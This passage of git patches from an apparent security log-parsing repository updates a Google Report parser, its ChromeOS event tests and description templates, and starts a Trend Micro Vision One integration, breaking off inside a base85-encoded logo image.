"CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "id": "0x2", + "model": { + "identifier": "S5NXNZ00A000000", + "name": "2.0 root hub" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..49574fa28 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -0,0 +1,45 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "device": { + "model": { + "identifier": "S5NXNZ00A000000" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file From 3221f63e4467bb80d815c9e37e2ce48f95f74b44 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:27:24 +0100 Subject: [PATCH 29/84] Apply linter --- Google Cloud/google-report/ingest/parser.yml | 2 +- Google Cloud/google-report/tests/test_chrome_sample_1.json | 4 ++-- Google Cloud/google-report/tests/test_chrome_sample_2.json | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index c92e4bf32..2dde85fdb 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -290,7 +290,7 @@ stages: device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["change"] filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index 36c42d3d5..e0e145d54 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index 49574fa28..ecbf27de3 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", From f2dd3b05166600bb2e7e6a91ba6fc89cbbc6e400 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:44:12 +0100 Subject: [PATCH 30/84] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 8 +++++++- Google Cloud/google-report/ingest/parser.yml | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 82e74ecd7..b58cf816e 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -174,6 +174,13 @@ { "field": "network.application", "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + } + ] + }, + { "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", "conditions": [ { @@ -263,7 +270,6 @@ "field": "event.action" }, { - "field": "google.report.access.application" "field": "google.report.saml.application_name" } ] diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index f3b54b479..f928e2148 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -272,7 +272,7 @@ stages: event.type: ["denied"] device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' - + set_rules_fields: actions: - set: From 1e5f81194e4fe8d0f69df8ea7d743b39d35fd469 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 10:47:49 +0100 Subject: [PATCH 31/84] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index b58cf816e..c1a559ed7 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -177,6 +177,12 @@ }, { "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" } ] }, From 7478edd763b6ef7828fbc8cbf8e481b7aa1c2b1b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:27:09 +0100 Subject: [PATCH 32/84] Fix smart desc --- .../_meta/smart-descriptions.json | 22 ------------------- 1 file changed, 22 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index c1a559ed7..a25527ef8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -293,9 +293,6 @@ }, { "field": "user.email" - }, - { - "field": "google.report.saml.application_name" } ] }, @@ -334,25 +331,6 @@ } ] }, - { - "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", - "conditions": [ - { - "field": "network.application", - "value": "saml" - }, - { - "field": "event.action", - "value": "login_failure" - }, - { - "field": "user.email" - }, - { - "field": "google.report.saml.application_name" - } - ] - }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ From 65af5b12298e7c7884511b6f93260bf41fbc2b8b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:41:54 +0100 Subject: [PATCH 33/84] Add some modification to the parser --- .../google-report/_meta/smart-descriptions.json | 4 ++-- Google Cloud/google-report/ingest/parser.yml | 6 ++++-- .../google-report/tests/test_chrome_sample_1.json | 10 ++++++++-- .../google-report/tests/test_chrome_sample_2.json | 7 ++++--- 4 files changed, 18 insertions(+), 9 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 0ac5acfe5..0c49ccdf8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -283,7 +283,7 @@ ] }, { - "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", "conditions": [ { "field": "network.application", @@ -297,7 +297,7 @@ "field": "device.model.name" }, { - "field": "device.id" + "field": "device.model.identifier" } ] }, diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 2dde85fdb..e15db634e 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -287,9 +287,11 @@ stages: event.category: ["web"] organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' - device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' - device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}' - set: event.type: ["change"] diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index e0e145d54..6567eebf1 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -28,12 +28,18 @@ } }, "device": { - "id": "0x2", + "manufacturer": "Linux Foundation", "model": { - "identifier": "S5NXNZ00A000000", + "identifier": "0x2", "name": "2.0 root hub" } }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, "network": { "application": "chrome" }, diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index ecbf27de3..990b7f47c 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -27,9 +27,10 @@ "id": "C01x7c000" } }, - "device": { - "model": { - "identifier": "S5NXNZ00A000000" + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" } }, "network": { From 4c329f6eb9002b66e9c6bef52e60f7c1c340ecf0 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 12:27:34 +0100 Subject: [PATCH 34/84] Fix smart desc --- .../_meta/smart-descriptions.json | 32 +++++++++++++++++-- 1 file changed, 30 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 66d518071..81622bd9b 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -352,7 +352,7 @@ ] }, { - "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", "conditions": [ { "field": "network.application", @@ -367,11 +367,14 @@ }, { "field": "device.model.name" + }, + { + "field": "user.id" } ] }, { - "value": "The user on device model {device.model.name} log in due to {event.reason}", + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", "conditions": [ { "field": "network.application", @@ -386,6 +389,31 @@ }, { "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" } ] }, From 90a003cc629a1666e04ae08bd97a170fb0c27cfe Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:48:10 +0200 Subject: [PATCH 35/84] Add format for Trend Micro Vision One --- .../trend-micro-vision-one/CHANGELOG.md | 8 ++ .../trend-micro-vision-one/_meta/fields.yml | 29 +++++++ .../trend-micro-vision-one/_meta/logo.png | Bin 0 -> 10452 bytes .../trend-micro-vision-one/_meta/manifest.yml | 9 ++ .../_meta/smart-descriptions.json | 0 .../trend-micro-vision-one/ingest/parser.yml | 79 ++++++++++++++++++ .../tests/test_process.json | 66 +++++++++++++++ .../tests/test_registry.json | 72 ++++++++++++++++ 8 files changed, 263 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/CHANGELOG.md create mode 100644 Trend Micro/trend-micro-vision-one/_meta/fields.yml create mode 100644 Trend Micro/trend-micro-vision-one/_meta/logo.png create mode 100644 Trend Micro/trend-micro-vision-one/_meta/manifest.yml create mode 100644 Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json create mode 100644 Trend Micro/trend-micro-vision-one/ingest/parser.yml create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_process.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_registry.json diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml new file mode 100644 index 000000000..f18d3cb5d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml @@ -0,0 +1,29 @@ +trendmicro.vision_one.alert_id: + description: '' + name: trendmicro.vision_one.alert_id + type: keyword + +trendmicro.vision_one.case_id: + description: '' + name: trendmicro.vision_one.case_id + type: keyword + +trendmicro.vision_one.incident_id: + description: '' + name: trendmicro.vision_one.incident_id + type: keyword + +trendmicro.vision_one.investigation_status: + description: '' + name: trendmicro.vision_one.investigation_status + type: keyword + +trendmicro.vision_one.severity: + description: '' + name: trendmicro.vision_one.severity + type: keyword + +trendmicro.vision_one.status: + description: '' + name: trendmicro.vision_one.status + type: keyword diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..e51bb3eb7725123b5278a71034969dfbbd5ca157 GIT binary patch literal 10452 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 